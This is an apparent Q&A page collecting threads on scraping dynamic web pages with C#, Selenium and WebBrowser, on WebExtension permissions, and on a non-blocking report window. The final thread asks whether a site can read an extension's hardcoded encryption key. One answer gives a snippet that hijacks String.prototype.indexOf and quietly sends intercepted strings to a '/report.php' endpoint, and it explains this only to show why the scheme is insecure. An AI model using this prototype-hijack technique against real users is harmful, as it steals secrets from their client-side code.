I'm scraping dynamic data from a website. For some reason the PageSource that I get() is partial. However, it is not partial when I view the page source directly from Chrome or Firefox browsers. I would like to know an answer that will enable me to completely scrape the data from the page.
For my application, I want to scrape programmatically using a .Net web browser or similar. I've tried using Selenium WebDriver 2.48.2 with ChromeDriver; I've also tried PhantomJSDriver; I've also tried WebClient; and also HttpWebRequest. All with .Net 4.6.1.
The url: http://contests.covers.com/KingOfCovers/Contestant/PendingPicks/ARTDB
None of the following are working...
Attempt #1: HttpWebRequest
var urlContent = "";
try
{
var request = (HttpWebRequest) WebRequest.Create(url);
request.CookieContainer = new CookieContainer();
if (cookies != null)
{
foreach (Cookie cookie in cookies)
{
request.CookieContainer.Add(cookie);
}
}
var responseTask = Task.Factory.FromAsync<WebResponse>(request.BeginGetResponse,request.EndGetResponse,null);
using (var response = (HttpWebResponse)await responseTask)
{
if (response.Cookies != null)
{
foreach (Cookie cookie in response.Cookies)
{
cookies.Add(cookie);
}
}
using (var sr = new StreamReader(response.GetResponseStream()))
{
urlContent = sr.ReadToEnd();
}
}
Attempt #2: WebClient
// requires async method signature
using (WebClient client = new WebClient())
{
var task = await client.DownloadStringTaskAsync(url);
return task;
}
Attempt #3: PhantomJSDriver
var driverService = PhantomJSDriverService.CreateDefaultService();
driverService.HideCommandPromptWindow = true;
using (var driver = new PhantomJSDriver(driverService))
{
driver.Navigate().GoToUrl(url);
WaitForAjax(driver);
string source = driver.PageSource;
return source;
}
public static void WaitForAjax(PhantomJSDriver driver)
{
while (true) // Handle timeout somewhere
{
var ajaxIsComplete = (bool)(driver as IJavaScriptExecutor).ExecuteScript("return jQuery.active == 0");
if (ajaxIsComplete)
break;
Thread.Sleep(100);
}
}
I also tried ChromeDriver using page object model. That code is too long to paste here; nonetheless: it has the exact same result as the other 3 attempts.
Expected Results
The data table from the url is complete, without any missing data. For example, here is a screenshot to compare to the screen shot below. The thing to observe is that there is NOT an "...". Instead there is the data. This can reproduced by opening the url in Firefox or Chrome, right click, and View Page Source.
Actual Results
Observe that where the "..." is a big gap, as the arrow indicates in the screen shot. There should be many rows of content in place of that "...". This can be reproduced using any of the above attempts above.
Please note that the url is dynamic data. You will likely not see the exact same results as the screen shots. Nonetheless, the exercise can be repeated it will simply look different than the screen shots. A quick test to understand that there is missing data is to compare the Page Source line count: the "complete" data set will have nearly twice as many rows in the html.
Ok, as requested. glad to have helped. :)
But in your C# were are you copying from?, in your code you have -> urlContent = sr.ReadToEnd(); How are you seeing, copying the result from this?. Are you copying from the debugger?, if so it's maybe the object inspector of the debugger that's trimming. Have you tried getting the result from urlContent and saving to file?. eg. System.IO.File.WriteAllText(#"temp.txt",urlContent);
Related
I'm trying to scrape Instagram using Python and Selenium. Goal is to get the url of all the posts, number of comments, number of likes, etc.
I was able to scrape some data but for some reason the page doesn't show more than 12 latest entries. I'm unable to figure out a way to show all the other entries. I've even tried scrolling down and then reading the page but it's only giving 12. I checked the source and am unable to find how to get the rest of the entries. It looks like the 12 entries are embedded into the script tag and I don't see it anywhere else.
driver = webdriver.Chrome('chromedriver.exe')
driver.get('https://www.instagram.com/fazeapparel/?hl=en')
source = driver.page_source
data=bs(source, 'html.parser')
body = data.find('body')
script = body.find('script', text=lambda t: t.startswith('window._sharedData'))
page_json = script.text.split(' = ', 1)[1].rstrip(';')
data = json.loads(page_json)
Using the data retrieved, I was able to find the information and collect them.
for each in data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_owner_to_timeline_media']['edges']:
link = 'https://www.instagram.com'+'/p/'+each['node']['shortcode']+'/'
posttext = each['node']['edge_media_to_caption']['edges'][0]['node']['text'].replace('\n','')
comments = each['node']['edge_media_to_comment']['count']
likes = each['node']['edge_liked_by']['count']
postimage = each['node']['thumbnail_src']
isvideo = each['node']['is_video']
postdate = time.strftime('%Y %b %d %H:%M:%S', time.localtime(each['node']['taken_at_timestamp']))
links.append([link, posttext, comments, likes, postimage, isvideo, postdate])
I've even created a scroll function to scroll the window and then scraping the data but it's only returning 12.
Is there any way I can get more than 12 entries? This account has 46 entries and I'm unable to find it anywhere in the code. Please Help!
Edit: I think the data is embedded within React so it's not showing all the posts
Have you added using OpenQA.Selenium.Support.UI ? It has a WebDriverWait and you can wait for the element to be visible. Sorry for doing this in C#.
Boxes should returns all the posts.
Again, I know it isn't in Python, but I hope it helps.
IWebDriver driver = new ChromeDriver("C:\\Users\\admin\\downloads", options);
WebDriverWait wait = new WebDriverWait(driver, time);
driver.Navigate().GoToUrl("www.instagram.com\cnn");
IWebElement mainDocument = wait.Until(SeleniumExtras.WaitHelpers.ExpectedConditions.ElementExists(By.TagName("body")));
IWebElement element = mainDocument.FindElements(By.CssSelector("#react-root > section > main > div > div._2z6nI > article > div > div");
IList <IWebElement> boxes = element.FindElements(By.TagName("div"));
foreach (var posts in boxes)
{
//do stuff here
}
EDIT:
It is making a ajax call on the back end to load the next posts when you scroll. One way might be to run a script that scrolls down. You would want to call this script in selenium. I would add logic to with a timer to wait while the script runs and check if it returns "STOP". Any type of thread sleeps blocks the thread. I would use some start of timer to call the method that runs my script.
function scrollDown() {
//once this bottom element disappears we found all the posts
var bottom = document.querySelector('._4emnV')
if (bottom != null) {
window.scroll(0,999999)
}
else
{
return "STOP"
}
}
I am working on a webextension in Firefox for use internally at work. The purpose of the extension is to insert relevant information from our ServiceNow instance into Nagios host/service page.
I am currently trying to insert the state of tickets into the history tab of Nagios. My script looks like this:
var table = document.getElementById('id_historytab_table');
var table = table.getElementsByTagName('tbody');
var table = table[1];
var len = table.children.length
const url = "https://[domain].service-now.com/api/now/table/task?sysparm_limit=1&number="
for (i = 1; i <= len; i++) {
var col = table.rows[i].cells[2];
if (col.textContent.startsWith("TKT")) {
var tkt = col.textContent;
//console.log(tkt);
//console.log(url+tkt);
var invocation = new XMLHttpRequest();
invocation.open("get",url+tkt, true);
invocation.withCredentials = true;
invocation.onreadystatechange = function() {
if(this.readyState == this.DONE) {
//console.log('recieved');
console.log(invocation.responseText);
//console.log(JSON.parse(invocation.responseText).result[0].state);
}
};
invocation.send();
};
};
This successfully gets the ticket number from each row of the history tab and makes a GET request. I can see the requests on my ServiceNow REST log and it looks good there. However, the response is never received.
If I copy and paste the above from my content-script.js and put it directly into my console I am able to iterate through the rows, get the ticket numbers, and successfully receive responses from ServiceNow. So this works, but not in WebExtension for some reason. I am about at the end of my knowledge of extensions and javascript though and am not sure what else to do.
I figured out the problem. In order for the WebExtension to receive the response the URL needs to be under permissions in the manifest.json. Adding:
"permissions": [ "url" ],
resolved the issues and I immediately began seeing the response bodies I was expecting.
Most of the answers I have read concerning this subject point to either the System.Windows.Forms.WebBrowser class or the COM interface mshtml.HTMLDocument from the Microsoft HTML Object Library assembly.
The WebBrowser class did not lead me anywhere. The following code fails to retrieve the HTML code as rendered by my web browser:
[STAThread]
public static void Main()
{
WebBrowser wb = new WebBrowser();
wb.Navigate("https://www.google.com/#q=where+am+i");
wb.DocumentCompleted += delegate(object sender, WebBrowserDocumentCompletedEventArgs e)
{
mshtml.IHTMLDocument2 doc = (mshtml.IHTMLDocument2)wb.Document.DomDocument;
foreach (IHTMLElement element in doc.all)
{
System.Diagnostics.Debug.WriteLine(element.outerHTML);
}
};
Form f = new Form();
f.Controls.Add(wb);
Application.Run(f);
}
The above is just an example. I'm not really interested in finding a workaround for figuring out the name of the town where I am located. I simply need to understand how to retrieve that kind of dynamically generated data programmatically.
(Call new System.Net.WebClient.DownloadString("https://www.google.com/#q=where+am+i"), save the resulting text somewhere, search for the name of the town where you are currently located, and let me know if you were able to find it.)
But yet when I access "https://www.google.com/#q=where+am+i" from my Web Browser (ie or firefox) I see the name of my town written on the web page. In Firefox, if I right click on the name of the town and select "Inspect Element (Q)" I clearly see the name of the town written in the HTML code which happens to look quite different from the raw HTML that is returned by WebClient.
After I got tired of playing System.Net.WebBrowser, I decided to give mshtml.HTMLDocument a shot, just to end up with the same useless raw HTML:
public static void Main()
{
mshtml.IHTMLDocument2 doc = (mshtml.IHTMLDocument2)new mshtml.HTMLDocument();
doc.write(new System.Net.WebClient().DownloadString("https://www.google.com/#q=where+am+i"));
foreach (IHTMLElement e in doc.all)
{
System.Diagnostics.Debug.WriteLine(e.outerHTML);
}
}
I suppose there must be an elegant way to obtain this kind of information. Right now all I can think of is add a WebBrowser control to a form, have it navigate to the URL in question, send the keys "CLRL, A", and copy whatever happens to be displayed on the page to the clipboard and attempt to parse it. That's horrible solution, though.
I'd like to contribute some code to Alexei's answer. A few points:
Strictly speaking, it may not always be possible to determine when the page has finished rendering with 100% probability. Some pages
are quite complex and use continuous AJAX updates. But we
can get quite close, by polling the page's current HTML snapshot for changes
and checking the WebBrowser.IsBusy property. That's what
LoadDynamicPage does below.
Some time-out logic has to be present on top of the above, in case the page rendering is never-ending (note CancellationTokenSource).
Async/await is a great tool for coding this, as it gives the linear
code flow to our asynchronous polling logic, which greatly simplifies it.
It's important to enable HTML5 rendering using Browser Feature
Control, as WebBrowser runs in IE7 emulation mode by default.
That's what SetFeatureBrowserEmulation does below.
This is a WinForms app, but the concept can be easily converted into a console app.
This logic works well on the URL you've specifically mentioned: https://www.google.com/#q=where+am+i.
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace WbFetchPage
{
public partial class MainForm : Form
{
public MainForm()
{
SetFeatureBrowserEmulation();
InitializeComponent();
this.Load += MainForm_Load;
}
// start the task
async void MainForm_Load(object sender, EventArgs e)
{
try
{
var cts = new CancellationTokenSource(10000); // cancel in 10s
var html = await LoadDynamicPage("https://www.google.com/#q=where+am+i", cts.Token);
MessageBox.Show(html.Substring(0, 1024) + "..." ); // it's too long!
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
// navigate and download
async Task<string> LoadDynamicPage(string url, CancellationToken token)
{
// navigate and await DocumentCompleted
var tcs = new TaskCompletionSource<bool>();
WebBrowserDocumentCompletedEventHandler handler = (s, arg) =>
tcs.TrySetResult(true);
using (token.Register(() => tcs.TrySetCanceled(), useSynchronizationContext: true))
{
this.webBrowser.DocumentCompleted += handler;
try
{
this.webBrowser.Navigate(url);
await tcs.Task; // wait for DocumentCompleted
}
finally
{
this.webBrowser.DocumentCompleted -= handler;
}
}
// get the root element
var documentElement = this.webBrowser.Document.GetElementsByTagName("html")[0];
// poll the current HTML for changes asynchronosly
var html = documentElement.OuterHtml;
while (true)
{
// wait asynchronously, this will throw if cancellation requested
await Task.Delay(500, token);
// continue polling if the WebBrowser is still busy
if (this.webBrowser.IsBusy)
continue;
var htmlNow = documentElement.OuterHtml;
if (html == htmlNow)
break; // no changes detected, end the poll loop
html = htmlNow;
}
// consider the page fully rendered
token.ThrowIfCancellationRequested();
return html;
}
// enable HTML5 (assuming we're running IE10+)
// more info: https://stackoverflow.com/a/18333982/1768303
static void SetFeatureBrowserEmulation()
{
if (LicenseManager.UsageMode != LicenseUsageMode.Runtime)
return;
var appName = System.IO.Path.GetFileName(System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName);
Registry.SetValue(#"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION",
appName, 10000, RegistryValueKind.DWord);
}
}
}
Your web-browser code looks reasonable - wait for something, that grab current content. Unfortunately there is no official "I'm done executing JavaScript, feel free to steal content" notification from browser nor JavaScript.
Some sort of active wait (not Sleep but Timer) may be necessary and page-specific. Even if you use headless browser (i.e. PhantomJS) you'll have the same issue.
I was asked to take a look at what should be a simple problem with one of our web pages for a small dashboard web app. This app just shows some basic state info for underlying backend apps which I work heavily on. The issues is as follows:
On a page where a user can input parameters and request to view a report with the given user input, a button invokes a JS function which opens a new page in the browser to show the rendered report. The code looks like this:
$('#btnShowReport').click(function () {
document.getElementById("Error").innerHTML = "";
var exists = CheckSession();
if (exists) {
window.open('<%=Url.Content("~/Reports/Launch.aspx?Report=Short&Area=1") %>');
}
});
The page that is then opened has the following code which is called from Page_Load:
rptViewer.ProcessingMode = ProcessingMode.Remote
rptViewer.AsyncRendering = True
rptViewer.ServerReport.Timeout = CInt(WebConfigurationManager.AppSettings("ReportTimeout")) * 60000
rptViewer.ServerReport.ReportServerUrl = New Uri(My.Settings.ReportURL)
rptViewer.ServerReport.ReportPath = "/" & My.Settings.ReportPath & "/" & Request("Report")
'Set the report to use the credentials from web.config
rptViewer.ServerReport.ReportServerCredentials = New SQLReportCredentials(My.Settings.ReportServerUser, My.Settings.ReportServerPassword, My.Settings.ReportServerDomain)
Dim myCredentials As New Microsoft.Reporting.WebForms.DataSourceCredentials
myCredentials.Name = My.Settings.ReportDataSource
myCredentials.UserId = My.Settings.DatabaseUser
myCredentials.Password = My.Settings.DatabasePassword
rptViewer.ServerReport.SetDataSourceCredentials(New Microsoft.Reporting.WebForms.DataSourceCredentials(0) {myCredentials})
rptViewer.ServerReport.SetParameters(parameters)
rptViewer.ServerReport.Refresh()
I have omitted some code which builds up the parameters for the report, but I doubt any of that is relevant.
The problem is that, when the user clicks the show report button, and this new page opens up, depending on the types of parameters they use the report could take quite some time to render, and in the mean time, the original page becomes completely unresponsive. The moment the report page actually renders, the main page begins functioning again. Where should I start (google keywords, ReportViewer properties, etc) if I want to fix this behavior such that the other page can load asynchronously without affecting the main page?
Edit -
I tried doing the follow, which was in a linked answer in a comment here:
$.ajax({
context: document.body,
async: true, //NOTE THIS
success: function () {
window.open(Address);
}
});
this replaced the window.open call. This seems to work, but when I check out the documentation, trying to understand what this is doing I found this:
The .context property was deprecated in jQuery 1.10 and is only maintained to the extent needed for supporting .live() in the jQuery Migrate plugin. It may be removed without notice in a future version.
I removed the context property entirely and it didnt seem to affect the code at all... Is it ok to use this ajax call in this way to open up the other window, or is there a better approach?
Using a timeout should open the window without blocking your main page
$('#btnShowReport').click(function () {
document.getElementById("Error").innerHTML = "";
var exists = CheckSession();
if (exists) {
setTimeout(function() {
window.open('<%=Url.Content("~/Reports/Launch.aspx?Report=Short&Area=1") %>');
}, 0);
}
});
This is a long shot, but have you tried opening the window with a blank URL first, and subsequently changing the location?
$("#btnShowReport").click(function(){
If (CheckSession()) {
var pop = window.open ('', 'showReport');
pop = window.open ('<%=Url.Content("~/Reports/Launch.aspx?Report=Short&Area=1") %>', 'showReport');
}
})
use
`$('#btnShowReport').click(function () {
document.getElementById("Error").innerHTML = "";
var exists = CheckSession();
if (exists) {
window.location.href='<%=Url.Content("~/Reports/Launch.aspx?Report=Short&Area=1") %>';
}
});`
it will work.
I created a google-chrome-extension which redirects all requests of a javascript-file on a website to a modified version of this file which is on my harddrive.
It works and I do it simplified like this:
... redirectUrl: chrome.extension.getURL("modified.js") ...
Modified.js is the same javascript file except that I modified a line in the code.
I changed something that looks like
var message = mytext.value;
to var message = aes.encrypt(mytext.value,"mysecretkey");
My question is now is it possible for the admin of this website where I redirect the javascript-file to modify his webpage that he can obtain "mysecretkey". (The admin knows how my extension works and which line is modified but doesn't know the used key)
Thanks in advance
Yes, the "admin" can read the source code of your code.
Your method is very insecure. There are two ways to read "mysecretkey".
Let's start with the non-trivial one: Get a reference to the source. Examples, assume that your aes.encrypt method looks like this:
(function() {
var aes = {encrypt: function(val, key) {
if (key.indexOf('whatever')) {/* ... */}
}};
})();
Then it can be compromised using:
(function(indexOf) {
String.prototype.indexOf = function(term) {
if (term !== 'known') (new Image).src = '/report.php?t=' + term;
return indexOf.apply(this, arguments);
};
})(String.prototype.indexOf);
Many prototype methods result in possible leaking, as well as arguments.callee. If the "admin" wants to break your code, he'll surely be able to achieve this.
The other method is much easier to implement:
var x = new XMLHttpRequest();
x.open('GET', '/possiblymodified.js');
x.onload = function() {
console.log(x.responseText); // Full source code here....
};
x.send();
You could replace the XMLHttpRequest method, but at this point, you're just playing the cat and mouse game. Whenever you think that you've secured your code, the other will find a way to break it (for instance, using the first described method).
Since the admin can control any aspect of the site, they could easily modify aes.encrypt to post the second argument to them and then continue as normal. Therefore your secret key would be immediately revealed.
No. The Web administrator would have no way of seeing what you set it to before it could get sent to the server where he could see it.